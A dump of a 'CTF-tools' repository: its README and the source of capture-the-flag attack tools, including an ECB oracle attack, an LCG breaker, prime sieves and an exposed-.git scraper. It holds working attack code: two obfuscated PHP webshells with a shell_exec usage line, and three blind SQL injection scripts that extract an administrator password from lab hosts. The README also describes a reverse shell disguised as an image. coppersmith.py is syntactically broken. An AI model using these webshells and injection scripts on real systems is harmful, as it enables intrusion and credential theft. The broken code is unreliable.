├── ECBoracle.py ├── LCG.py ├── MiniShell1.php ├── MiniShell2.php ├── README.md ├── SQLi ├── README.md ├── blind_error_based.py ├── blind_response_based.py └── blind_timing_based.py ├── coppersmith.py ├── diggit.py ├── getprimes.py ├── grab.php ├── jwt_tool.py ├── pupper.jpg.php ├── sherlock ├── .dockerignore ├── .travis.yml ├── Alpha-maniak.txt ├── AlphaManiak.txt ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── README.md ├── __pycache__ │ └── load_proxies.cpython-37.pyc ├── alpha-maniak.txt ├── data.json ├── data_bad_site.json ├── docker-compose.yml ├── images │ ├── preview.png │ └── sherlock_preview.gif ├── load_proxies.py ├── removed_sites.md ├── requirements.txt ├── sherlock.py ├── site_list.py ├── sites.md └── tests │ ├── __init__.py │ ├── all.py │ └── base.py └── weiner.py /ECBoracle.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | import binascii 4 | import string 5 | 6 | ses = requests.session() 7 | 8 | def checkECB(data, block_size): 9 | n = len(data)//block_size 10 | for i in range(n): 11 | for j in range(i+1,n): 12 | if data[i*block_size:(i+1)*block_size] == data[j*block_size:(j+1)*block_size]: 13 | return True 14 | return False 15 | 16 | def detect_mode(oracle): 17 | resp, actual_mode = oracle(b'a'*50) 18 | if checkECB(resp, 32): 19 | predicted_mode = 'ECB' 20 | else: 21 | predicted_mode = 'CBC' 22 | success = actual_mode == predicted_mode 23 | return (predicted_mode, success) 24 | 25 | 26 | def ECB_oracle(inp): 27 | payload = inp.hex() 28 | enc = ses.get(f'http://aes.cryptohack.org/ecb_oracle/encrypt/{payload}').text 29 | c = json.loads(enc)['ciphertext'] 30 | return (c, 'ECB') 31 | 32 | def leak_ECB_secret(oracle): 33 | mode, confirmation = detect_mode(oracle) 34 | 35 | assert(confirmation) 36 | 37 | if mode != 'ECB': 38 | print('The oracle is not ECB') 39 | return -1 40 | 41 | print('ECB Oracle detected') 42 | 43 | blength = 0 44 | while True: 45 | 
a1 = oracle(b'a'*blength)[0] 46 | a2 = oracle(b'a'*(blength+1))[0] 47 | if a1[:32] == a2[:32]: 48 | break 49 | blength += 1 50 | print(f'Found Block length: {blength}') 51 | 52 | blocks_to_be_scanned = 4 53 | secret = b'c' 54 | for block in range(blocks_to_be_scanned): 55 | for i in range(1, blength + 1): 56 | if i == blength: 57 | payload = b'a'*blength 58 | h = oracle(payload)[0][(block+1)*32:(block+2)*32] 59 | payload += secret 60 | for byte in string.printable.encode(): 61 | if oracle(payload + bytes([byte]))[0][(block+1)*32:(block+2)*32] == h: 62 | secret += bytes([byte]) 63 | print (secret) 64 | else: 65 | payload = b'a'*(blength - i) 66 | h = oracle(payload)[0][block*32:(block+1)*32] 67 | payload += secret 68 | for byte in string.printable.encode(): 69 | if oracle(payload + bytes([byte]))[0][block*32:(block+1)*32] == h: 70 | secret += bytes([byte]) 71 | print (secret) 72 | 73 | print ('##################') 74 | print (secret[:-1].decode()) 75 | 76 | if __name__ == '__main__': 77 | leak_ECB_secret(ECB_oracle) -------------------------------------------------------------------------------- /LCG.py: -------------------------------------------------------------------------------- 1 | import random 2 | from Crypto.Cipher import AES 3 | from Crypto.Util.number import * 4 | import sys 5 | import os 6 | # Linear Congruential Generator breaker example 7 | P = 295075153L # This will work as our LCG "secret" 8 | 9 | class WeakPrng(object): 10 | def __init__(self, p): # generate seed with 56 bits of entropy 11 | self.p = p 12 | self.x = random.randint(0, p) 13 | 14 | def next(self): 15 | self.x = (2*self.x + 5) % self.p # On this case, our 'a' and 'c' are 2 and 5 respectivelly. 16 | return self.x 17 | 18 | def calc_det(i,j,X): #This determinant along with the GCD will allow us to get 'p' with a very high probability! 
19 | """ Calculate the values for the matrix[lattice] """ 20 | a1 = X[i] - X[0] 21 | b1 = X[i+1] - X[1] 22 | a2 = X[j] - X[0] 23 | b2 = X[j+1] - X[1] 24 | 25 | """ Calculate the determinant """ 26 | det = a1*b2 - a2*b1 27 | return abs(det) 28 | 29 | def GCD(a,b): 30 | """ Euclidean Algo""" 31 | a = abs(a) 32 | b = abs(b) 33 | while a: 34 | a,b = long(b%a),a 35 | return b 36 | 37 | prng = WeakPrng(P) 38 | X = [45779928998446,26621650748547,50483770559288,111003181280269,106370168505090,157483768091351,130718729880652,115158553978593] 39 | 40 | Det_X = [] 41 | Det_X.append(calc_det(1,2,X)) 42 | print Det_X 43 | Det_X.append(calc_det(2,3,X)) 44 | print Det_X 45 | Det_X.append(calc_det(3,4,X)) 46 | print Det_X 47 | Det_X.append(calc_det(4,5,X)) 48 | print Det_X 49 | 50 | found_p = GCD(Det_X[0], Det_X[1]) 51 | found_p = GCD(found_p, Det_X[2]) 52 | found_p = GCD(found_p, Det_X[3]) 53 | print found_p # This is our 'p'! Using only 5 intercepted numbers generated by the LCG we were able to succesfully break the "secret" modulo! Now its easy to find out 'a' and 'c' 54 | 55 | 56 | # To find 'a' and 'c' we need to solve the simple equation: 57 | # a = ((x3 - x4)*INVERSE_MODULE((x2-x3),p))%p 58 | # And: 59 | # c = (x4 - a*x3)%p 60 | # Where x2, x3, x4 are all numbers generated by the LCG that we got already! 61 | 62 | mod_inv_a = inverse((X[2]-X[3]), found_p) # Here we find the modular inverse of x2-x3 with modulo p 63 | print (X[2]-X[3])%found_p 64 | found_a = ((X[3] - X[4])*mod_inv_a)%found_p 65 | print found_a #found_a will be the correct a with high probability. 66 | 67 | found_c = (X[4] - found_a*X[3])%found_p 68 | print found_c #found_c will be the correct a with high probability, clearly depending on the correctness of a 69 | 70 | print "Now we found: %d as P, %d as a and %d as c, so we can forge the LCG!" 
% (found_p, found_a, found_c) 71 | 72 | def lcg(x): 73 | return (found_a*x+found_c)%found_p 74 | 75 | print "the next few values are : " 76 | for i in range(10): 77 | X.append(lcg(X[-1])) 78 | print(X[-1]) -------------------------------------------------------------------------------- /MiniShell1.php: -------------------------------------------------------------------------------- 1 | /";${$_}[_](${$_}[__]); 2 | // $_GET[_]($_GET[__]); 3 | -------------------------------------------------------------------------------- /MiniShell2.php: -------------------------------------------------------------------------------- 1 | /";${$_}{"_"}(${$_}{"__"}(${$_}{"_1"})); 3 | // /page?_=var_dump&__=shell_exec&_1=command 4 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF-tools 2 | A collection of exploits or general scripts that often come in handy during CTFs 3 | 4 | - `Sherlock`: OSINT tool used to find online presence connected to a particular username. **Credits: https://github.com/sherlock-project/sherlock** 5 | - `jwt_tool.py`: Handy script for testing jsonwebtoken vulnerabilities. **Credits: https://github.com/ticarpi/jwt_tool** 6 | - `ECBoracle`: Exploit for an ECB padding oracle, a common class of challenges in security training labs. **Credits: Me** 7 | - `getprimes`: A collection of sieves and other algorithms for fast computation of primes. **Credits: Me + Stackoverflow** 8 | - `weiner`: Implementation of Wiener's attack on RSA. **Credits: Me** 9 | - `pupper.jpg.php`: A php reverse shell disguised as an image. Useful for fooling MIME type checks and exploiting file upload systems. **Credits: Me** 10 | - `diggit.py`: Automatically extracts exposed git directories in websites. **Credits: https://github.com/jrfaller/diggit** 11 | - `MiniShell1.php`: A small shell (31 characters) which does not contain any letters or numbers.
Needs to be executed via `shell_exec`. Helpful for bypassing regex checks and upload limits. **Credits: https://gist.github.com/mvisat/03592a5ab0743cd43c2aa65bf45fef21** 12 | - `MiniShell2.php`: A slightly modified version of MiniShell1.php which also works inside `eval` statements. **Credits: Me** 13 | - `grab.php`: A simple php file to dump incoming request queries. Useful as an Out of Band exfiltration endpoint in combination with ngrok or pagekite. **Credits: Me** 14 | - `coppersmith.py`: A simple implementation of the functions to be used in a classic Coppersmith's attack on RSA. **Credits: Me** 15 | - `LCG.py`: Simple script to break an LCG (linear congruential generator) RNG. **Credits: Unknown** 16 | - `SQLi`: Collection of scripts for extraction of data via blind SQL injection. **Credits: Me, @supra08, @sin3point14** 17 | -------------------------------------------------------------------------------- /SQLi/README.md: -------------------------------------------------------------------------------- 1 | - `blind_response_based.py`: Script for extraction of data via conditional-response based blind SQLi **Credits: Me, @supra08, @sin3point14** 2 | - `blind_error_based.py`: Script for extraction of data via conditional-error based blind SQLi **Credits: Me** 3 | - `blind_timing_based.py`: Script for extraction of data via timing attack/condition delay based blind SQLi **Credits: Me** 4 | -------------------------------------------------------------------------------- /SQLi/blind_error_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://acd51f971f211f2c8053d235009400db.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if r.status_code == 500: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 |
payload = f"x' UNION SELECT CASE WHEN (username = 'administrator' AND substr(password, {i}, 1)='{j}') THEN to_char(1/0) ELSE 'a' END FROM users --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /SQLi/blind_response_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://aca01f881faeafc88190893400e900f9.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if "Welcome back!" in r.text: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 | payload = f"x' UNION SELECT password FROM users WHERE username = 'administrator' AND SUBSTRING(password, {i}, 1)='{j}' --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /SQLi/blind_timing_based.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | 4 | url = "https://acd11fee1e8f4c39808e1a5e000200b0.web-security-academy.net/" 5 | 6 | 7 | def query(payload): 8 | cookie = { 'TrackingId': payload } 9 | r = requests.get(url, cookies=cookie) 10 | 11 | if r.elapsed.total_seconds() > 5.0: 12 | return 1 13 | else: 14 | return 0 15 | 16 | password = '' 17 | i = 1 18 | while True: 19 | for j in string.printable: 20 | payload = f"X' UNION SELECT CASE WHEN (username='administrator' AND substr(password, {i}, 1)='{j}') THEN (SELECT 'a' || pg_sleep(5)) END FROM users --" 21 | if query(payload) == 1: 22 | password += j 23 | break 24 | i += 1 25 | print(password) -------------------------------------------------------------------------------- /coppersmith.py: 
-------------------------------------------------------------------------------- 1 | 2 | from sage.all import * 3 | 4 | # f = (m + x)**e - c 5 | def stereotyped(f, N): 6 | P. = PolynomialRing(Zmod(N)) 7 | beta = 1 8 | dd = f.degree() 9 | epsilon = beta/7 10 | XX = ceil(N**((beta**2/dd) - epsilon)) 11 | rt = f.small_roots(XX, beta, epsilon) 12 | return rt 13 | 14 | def N-factorize(f, N): 15 | P. = PolynomialRing(Zmod(N)) 16 | beta = 0.5 17 | dd = f.degree() 18 | epsilon = beta/7 19 | XX = ceil(N**((beta**2/dd) - epsilon)) 20 | rt = f.small_roots(XX, beta, epsilon) 21 | return rt -------------------------------------------------------------------------------- /diggit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # bl4de | | https://twitter.com/_bl4de 4 | # 5 | # diggit - gets .git repository 6 | import argparse 7 | import os 8 | import re 9 | 10 | # some common definitions 11 | VERSION = "1.0.0" 12 | OBJECT_DIR = "/.git/objects/" 13 | 14 | term = { 15 | "black": '\33[30m', 16 | "red": '\33[31m', 17 | "green": '\33[32m', 18 | "yellow": '\33[33m', 19 | "blue": '\33[34m', 20 | "magenta": '\33[35m', 21 | "cyan": '\33[36m', 22 | "white": '\33[37m', 23 | "endl": '\33[0m' 24 | } 25 | 26 | 27 | def print_banner(): 28 | """Prints credits :)""" 29 | print "\n\n", "#" * 78 30 | print "###", " " * 70, "###" 31 | print "###", " " * 70, "###" 32 | print "### diggit.py | Twitter: @_bl4de " \ 33 | "| GitHub: bl4de ###" 34 | print "###", " " * 70, "###" 35 | print "###", " " * 70, "###" 36 | print "#" * 78 37 | 38 | 39 | def print_object_details(objtype, objcontent, objhash, objfilename): 40 | """Prints and saves object details/content""" 41 | 42 | print "\n" + term["cyan"] + "#" * 12 + " " + objhash \ 43 | + " information " + "#" * 12 + term["endl"] 44 | print "\n{0}[*] Object type: {3}{2}{1}{3}".format( 45 | term["green"], objtype, term["red"], term["endl"]) 46 | 47 | if objfilename != "": 48 | global 
localgitrepo 49 | tmpfp = localgitrepo + "/" + objfilename 50 | print "{0}[*] Object filename: {3}{2}{1}{3}".format( 51 | term["green"], objfilename, term["red"], term["endl"]) 52 | print "{0}[*] Object saved in {2}:{1}".format( 53 | term["green"], term["endl"], tmpfp) 54 | tmpfile = open(tmpfp, "w") 55 | tmpfile.write("// diggit.py by @bl4de | {} content\n".format(objhash)) 56 | tmpfile.writelines(objcontent) 57 | tmpfile.close() 58 | 59 | print "{0}[*] Object content:{1}\n".format(term["green"], term["endl"]) 60 | if len(objcontent) < 2048: 61 | print "{0}{1}{2}".format(term["yellow"], objcontent, term["endl"]) 62 | else: 63 | print "{}[!] file too big to preview - {} kB{}".format( 64 | term["red"], len(objcontent)/1024, term["endl"]) 65 | 66 | 67 | def get_object_url(objhash): 68 | """Returns object git url""" 69 | return OBJECT_DIR + objhash[0:2] + "/" + objhash[2:] 70 | 71 | 72 | def get_object_dir_prefix(objhash): 73 | """Returns object directory prefix (first two chars of object hash)""" 74 | return objhash[0:2] + "/" 75 | 76 | 77 | def get_objhash_from_object_desc(gitobjcontent): 78 | """returns object hash without control characters""" 79 | return gitobjcontent.split(" ")[1][:40] 80 | 81 | 82 | def save_git_object(baseurl, objhash, berecursive, objfilename=""): 83 | """Saves git object in temporary .git directory preserves its path""" 84 | finalurl = baseurl + "/" + get_object_url(objhash) 85 | 86 | os.system("curl --silent '" + finalurl + "' --create-dirs -o '" + 87 | localgitrepo + get_object_url(objhash) + "'") 88 | 89 | gitobjtype = os.popen("cd " + localgitrepo + OBJECT_DIR + 90 | get_object_dir_prefix(objhash) + 91 | " && git cat-file -t " + objhash).read() 92 | 93 | gitobjcontent = os.popen("cd " + localgitrepo + OBJECT_DIR + 94 | get_object_dir_prefix(objhash) + 95 | " && git cat-file -p " + objhash).read() 96 | print_object_details(gitobjtype, gitobjcontent, objhash, 97 | objfilename) 98 | 99 | # get actual tree from commit 100 | if 
gitobjtype.strip() == "commit" and berecursive is True: 101 | save_git_object(baseurl, 102 | get_objhash_from_object_desc(gitobjcontent), 103 | berecursive) 104 | 105 | if gitobjtype.strip() == "tree" and berecursive is True: 106 | for obj in gitobjcontent.split("\n"): 107 | if obj: 108 | obj = obj.strip().split(" ") 109 | objhash = obj[2][:40] 110 | real_filename = obj[2].split("\t")[1] 111 | if objhash != "" and re.match(r"[a-zA-Z0-9]", objhash): 112 | save_git_object(baseurl, objhash, berecursive, 113 | real_filename) 114 | 115 | 116 | if __name__ == "__main__": 117 | parser = argparse.ArgumentParser(description=""" 118 | diggit.py - get information about Git object(s) from remote 119 | repository 120 | """) 121 | parser.add_argument('-u', help='URL of remote Git repository location') 122 | parser.add_argument('-t', 123 | help='path to temporary Git folder on local machine') 124 | parser.add_argument('-o', help='object hash (SHA-1, all 40 characters)') 125 | parser.add_argument('-r', default=False, 126 | help='be recursive (if commit or tree hash ' 127 | 'found get all blobs too). Default is \'False\'') 128 | 129 | args = parser.parse_args() 130 | 131 | # domain, base path for .git folder, eg. http://website.com 132 | baseurl = args.u 133 | 134 | # hash of object to save 135 | objecthash = args.o 136 | berecursive = True if args.r else False 137 | 138 | # temporary dir with dummy .git structure (create it first!) 
139 | localgitrepo = args.t 140 | 141 | parser.print_help() 142 | 143 | if baseurl and objecthash: 144 | print_banner() 145 | save_git_object(args.u, args.o, berecursive, "") 146 | print "\n" + term["cyan"] + "#" * 78 + term["endl"] -------------------------------------------------------------------------------- /getprimes.py: -------------------------------------------------------------------------------- 1 | from math import sqrt, ceil 2 | import numpy as np 3 | 4 | def rwh_primes(n): 5 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 6 | """ Returns a list of primes < n """ 7 | sieve = [True] * n 8 | for i in xrange(3,int(n**0.5)+1,2): 9 | if sieve[i]: 10 | sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1) 11 | return [2] + [i for i in xrange(3,n,2) if sieve[i]] 12 | 13 | def rwh_primes1(n): 14 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 15 | """ Returns a list of primes < n """ 16 | sieve = [True] * (n/2) 17 | for i in xrange(3,int(n**0.5)+1,2): 18 | if sieve[i/2]: 19 | sieve[i*i/2::i] = [False] * ((n-i*i-1)/(2*i)+1) 20 | return [2] + [2*i+1 for i in xrange(1,n/2) if sieve[i]] 21 | 22 | def rwh_primes2(n): 23 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 24 | """ Input n>=6, Returns a list of primes, 2 <= p < n """ 25 | correction = (n%6>1) 26 | n = {0:n,1:n-1,2:n+4,3:n+3,4:n+2,5:n+1}[n%6] 27 | sieve = [True] * (n/3) 28 | sieve[0] = False 29 | for i in xrange(int(n**0.5)/3+1): 30 | if sieve[i]: 31 | k=3*i+1|1 32 | sieve[ ((k*k)/3) ::2*k]=[False]*((n/6-(k*k)/6-1)/k+1) 33 | sieve[(k*k+4*k-2*k*(i&1))/3::2*k]=[False]*((n/6-(k*k+4*k-2*k*(i&1))/6-1)/k+1) 34 | return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]] 35 | 36 | def sieve_wheel_30(N): 37 | # http://zerovolt.com/?p=88 38 | ''' Returns a list of primes <= N using wheel criterion 2*3*5 = 30 39 | 40 | 
Copyright 2009 by zerovolt.com 41 | This code is free for non-commercial purposes, in which case you can just leave this comment as a credit for my work. 42 | If you need this code for commercial purposes, please contact me by sending an email to: info [at] zerovolt [dot] com.''' 43 | __smallp = ( 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 44 | 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 45 | 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 46 | 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 47 | 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 48 | 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 49 | 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 50 | 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 51 | 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 52 | 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 53 | 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997) 54 | 55 | wheel = (2, 3, 5) 56 | const = 30 57 | if N < 2: 58 | return [] 59 | if N <= const: 60 | pos = 0 61 | while __smallp[pos] <= N: 62 | pos += 1 63 | return list(__smallp[:pos]) 64 | # make the offsets list 65 | offsets = (7, 11, 13, 17, 19, 23, 29, 1) 66 | # prepare the list 67 | p = [2, 3, 5] 68 | dim = 2 + N // const 69 | tk1 = [True] * dim 70 | tk7 = [True] * dim 71 | tk11 = [True] * dim 72 | tk13 = [True] * dim 73 | tk17 = [True] * dim 74 | tk19 = [True] * dim 75 | tk23 = [True] * dim 76 | tk29 = [True] * dim 77 | tk1[0] = False 78 | # help dictionary d 79 | # d[a , b] = c ==> if I want to find the smallest useful multiple of (30*pos)+a 80 | # on tkc, then I need the index given by the product of [(30*pos)+a][(30*pos)+b] 81 | # in general. 
If b < a, I need [(30*pos)+a][(30*(pos+1))+b] 82 | d = {} 83 | for x in offsets: 84 | for y in offsets: 85 | res = (x*y) % const 86 | if res in offsets: 87 | d[(x, res)] = y 88 | # another help dictionary: gives tkx calling tmptk[x] 89 | tmptk = {1:tk1, 7:tk7, 11:tk11, 13:tk13, 17:tk17, 19:tk19, 23:tk23, 29:tk29} 90 | pos, prime, lastadded, stop = 0, 0, 0, int(ceil(sqrt(N))) 91 | # inner functions definition 92 | def del_mult(tk, start, step): 93 | for k in xrange(start, len(tk), step): 94 | tk[k] = False 95 | # end of inner functions definition 96 | cpos = const * pos 97 | while prime < stop: 98 | # 30k + 7 99 | if tk7[pos]: 100 | prime = cpos + 7 101 | p.append(prime) 102 | lastadded = 7 103 | for off in offsets: 104 | tmp = d[(7, off)] 105 | start = (pos + prime) if off == 7 else (prime * (const * (pos + 1 if tmp < 7 else 0) + tmp) )//const 106 | del_mult(tmptk[off], start, prime) 107 | # 30k + 11 108 | if tk11[pos]: 109 | prime = cpos + 11 110 | p.append(prime) 111 | lastadded = 11 112 | for off in offsets: 113 | tmp = d[(11, off)] 114 | start = (pos + prime) if off == 11 else (prime * (const * (pos + 1 if tmp < 11 else 0) + tmp) )//const 115 | del_mult(tmptk[off], start, prime) 116 | # 30k + 13 117 | if tk13[pos]: 118 | prime = cpos + 13 119 | p.append(prime) 120 | lastadded = 13 121 | for off in offsets: 122 | tmp = d[(13, off)] 123 | start = (pos + prime) if off == 13 else (prime * (const * (pos + 1 if tmp < 13 else 0) + tmp) )//const 124 | del_mult(tmptk[off], start, prime) 125 | # 30k + 17 126 | if tk17[pos]: 127 | prime = cpos + 17 128 | p.append(prime) 129 | lastadded = 17 130 | for off in offsets: 131 | tmp = d[(17, off)] 132 | start = (pos + prime) if off == 17 else (prime * (const * (pos + 1 if tmp < 17 else 0) + tmp) )//const 133 | del_mult(tmptk[off], start, prime) 134 | # 30k + 19 135 | if tk19[pos]: 136 | prime = cpos + 19 137 | p.append(prime) 138 | lastadded = 19 139 | for off in offsets: 140 | tmp = d[(19, off)] 141 | start = (pos + prime) if 
off == 19 else (prime * (const * (pos + 1 if tmp < 19 else 0) + tmp) )//const 142 | del_mult(tmptk[off], start, prime) 143 | # 30k + 23 144 | if tk23[pos]: 145 | prime = cpos + 23 146 | p.append(prime) 147 | lastadded = 23 148 | for off in offsets: 149 | tmp = d[(23, off)] 150 | start = (pos + prime) if off == 23 else (prime * (const * (pos + 1 if tmp < 23 else 0) + tmp) )//const 151 | del_mult(tmptk[off], start, prime) 152 | # 30k + 29 153 | if tk29[pos]: 154 | prime = cpos + 29 155 | p.append(prime) 156 | lastadded = 29 157 | for off in offsets: 158 | tmp = d[(29, off)] 159 | start = (pos + prime) if off == 29 else (prime * (const * (pos + 1 if tmp < 29 else 0) + tmp) )//const 160 | del_mult(tmptk[off], start, prime) 161 | # now we go back to top tk1, so we need to increase pos by 1 162 | pos += 1 163 | cpos = const * pos 164 | # 30k + 1 165 | if tk1[pos]: 166 | prime = cpos + 1 167 | p.append(prime) 168 | lastadded = 1 169 | for off in offsets: 170 | tmp = d[(1, off)] 171 | start = (pos + prime) if off == 1 else (prime * (const * pos + tmp) )//const 172 | del_mult(tmptk[off], start, prime) 173 | # time to add remaining primes 174 | # if lastadded == 1, remove last element and start adding them from tk1 175 | # this way we don't need an "if" within the last while 176 | if lastadded == 1: 177 | p.pop() 178 | # now complete for every other possible prime 179 | while pos < len(tk1): 180 | cpos = const * pos 181 | if tk1[pos]: p.append(cpos + 1) 182 | if tk7[pos]: p.append(cpos + 7) 183 | if tk11[pos]: p.append(cpos + 11) 184 | if tk13[pos]: p.append(cpos + 13) 185 | if tk17[pos]: p.append(cpos + 17) 186 | if tk19[pos]: p.append(cpos + 19) 187 | if tk23[pos]: p.append(cpos + 23) 188 | if tk29[pos]: p.append(cpos + 29) 189 | pos += 1 190 | # remove exceeding if present 191 | pos = len(p) - 1 192 | while p[pos] > N: 193 | pos -= 1 194 | if pos < len(p) - 1: 195 | del p[pos+1:] 196 | # return p list 197 | return p 198 | 199 | def sieveOfEratosthenes(n): 200 | 
"""sieveOfEratosthenes(n): return the list of the primes < n.""" 201 | # Code from: , Nov 30 2006 202 | # http://groups.google.com/group/comp.lang.python/msg/f1f10ced88c68c2d 203 | if n <= 2: 204 | return [] 205 | sieve = range(3, n, 2) 206 | top = len(sieve) 207 | for si in sieve: 208 | if si: 209 | bottom = (si*si - 3) // 2 210 | if bottom >= top: 211 | break 212 | sieve[bottom::si] = [0] * -((bottom - top) // si) 213 | return [2] + [el for el in sieve if el] 214 | 215 | def sieveOfAtkin(end): 216 | """sieveOfAtkin(end): return a list of all the prime numbers , improved 219 | # Code: https://web.archive.org/web/20080324064651/http://krenzel.info/?p=83 220 | # Info: http://en.wikipedia.org/wiki/Sieve_of_Atkin 221 | assert end > 0 222 | lng = ((end-1) // 2) 223 | sieve = [False] * (lng + 1) 224 | 225 | x_max, x2, xd = int(sqrt((end-1)/4.0)), 0, 4 226 | for xd in xrange(4, 8*x_max + 2, 8): 227 | x2 += xd 228 | y_max = int(sqrt(end-x2)) 229 | n, n_diff = x2 + y_max*y_max, (y_max << 1) - 1 230 | if not (n & 1): 231 | n -= n_diff 232 | n_diff -= 2 233 | for d in xrange((n_diff - 1) << 1, -1, -8): 234 | m = n % 12 235 | if m == 1 or m == 5: 236 | m = n >> 1 237 | sieve[m] = not sieve[m] 238 | n -= d 239 | 240 | x_max, x2, xd = int(sqrt((end-1) / 3.0)), 0, 3 241 | for xd in xrange(3, 6 * x_max + 2, 6): 242 | x2 += xd 243 | y_max = int(sqrt(end-x2)) 244 | n, n_diff = x2 + y_max*y_max, (y_max << 1) - 1 245 | if not(n & 1): 246 | n -= n_diff 247 | n_diff -= 2 248 | for d in xrange((n_diff - 1) << 1, -1, -8): 249 | if n % 12 == 7: 250 | m = n >> 1 251 | sieve[m] = not sieve[m] 252 | n -= d 253 | 254 | x_max, y_min, x2, xd = int((2 + sqrt(4-8*(1-end)))/4), -1, 0, 3 255 | for x in xrange(1, x_max + 1): 256 | x2 += xd 257 | xd += 6 258 | if x2 >= end: y_min = (((int(ceil(sqrt(x2 - end))) - 1) << 1) - 2) << 1 259 | n, n_diff = ((x*x + x) << 1) - 1, (((x-1) << 1) - 2) << 1 260 | for d in xrange(n_diff, y_min, -8): 261 | if n % 12 == 11: 262 | m = n >> 1 263 | sieve[m] = not 
sieve[m] 264 | n += d 265 | 266 | primes = [2, 3] 267 | if end <= 3: 268 | return primes[:max(0,end-2)] 269 | 270 | for n in xrange(5 >> 1, (int(sqrt(end))+1) >> 1): 271 | if sieve[n]: 272 | primes.append((n << 1) + 1) 273 | aux = (n << 1) + 1 274 | aux *= aux 275 | for k in xrange(aux, end, 2 * aux): 276 | sieve[k >> 1] = False 277 | 278 | s = int(sqrt(end)) + 1 279 | if s % 2 == 0: 280 | s += 1 281 | primes.extend([i for i in xrange(s, end, 2) if sieve[i >> 1]]) 282 | 283 | return primes 284 | 285 | def ambi_sieve_plain(n): 286 | s = range(3, n, 2) 287 | for m in xrange(3, int(n**0.5)+1, 2): 288 | if s[(m-3)/2]: 289 | for t in xrange((m*m-3)/2,(n>>1)-1,m): 290 | s[t]=0 291 | return [2]+[t for t in s if t>0] 292 | 293 | def sundaram3(max_n): 294 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/2073279#2073279 295 | numbers = range(3, max_n+1, 2) 296 | half = (max_n)//2 297 | initial = 4 298 | 299 | for step in xrange(3, max_n+1, 2): 300 | for i in xrange(initial, half, step): 301 | numbers[i-1] = 0 302 | initial += 2*(step+1) 303 | 304 | if initial > half: 305 | return [2] + filter(None, numbers) 306 | 307 | ################################################################################ 308 | # Using Numpy: 309 | def ambi_sieve(n): 310 | # http://tommih.blogspot.com/2009/04/fast-prime-number-generator.html 311 | s = np.arange(3, n, 2) 312 | for m in xrange(3, int(n ** 0.5)+1, 2): 313 | if s[(m-3)/2]: 314 | s[(m*m-3)/2::m]=0 315 | return np.r_[2, s[s>0]] 316 | 317 | def primesfrom3to(n): 318 | # https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 319 | """ Returns a array of primes, p < n """ 320 | assert n>=2 321 | sieve = np.ones(n/2, dtype=np.bool) 322 | for i in xrange(3,int(n**0.5)+1,2): 323 | if sieve[i/2]: 324 | sieve[i*i/2::i] = False 325 | return np.r_[2, 2*np.nonzero(sieve)[0][1::]+1] 326 | 327 | def primesfrom2to(n): 328 | # 
https://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n-in-python/3035188#3035188 329 | """ Input n>=6, Returns a array of primes, 2 <= p < n """ 330 | sieve = np.ones(n/3 + (n%6==2), dtype=np.bool) 331 | sieve[0] = False 332 | for i in xrange(int(n**0.5)/3+1): 333 | if sieve[i]: 334 | k=3*i+1|1 335 | sieve[ ((k*k)/3) ::2*k] = False 336 | sieve[(k*k+4*k-2*k*(i&1))/3::2*k] = False 337 | return np.r_[2,3,((3*np.nonzero(sieve)[0]+1)|1)] 338 | 339 | # if __name__=='__main__': 340 | # import itertools 341 | # import sys 342 | 343 | # def test(f1,f2,num): 344 | # print('Testing {f1} and {f2} return same results'.format( 345 | # f1=f1.func_name, 346 | # f2=f2.func_name)) 347 | # if not all([a==b for a,b in itertools.izip_longest(f1(num),f2(num))]): 348 | # sys.exit("Error: %s(%s) != %s(%s)"%(f1.func_name,num,f2.func_name,num)) 349 | 350 | # n=1000000 351 | # test(sieveOfAtkin,sieveOfEratosthenes,n) 352 | # test(sieveOfAtkin,ambi_sieve,n) 353 | # test(sieveOfAtkin,ambi_sieve_plain,n) 354 | # 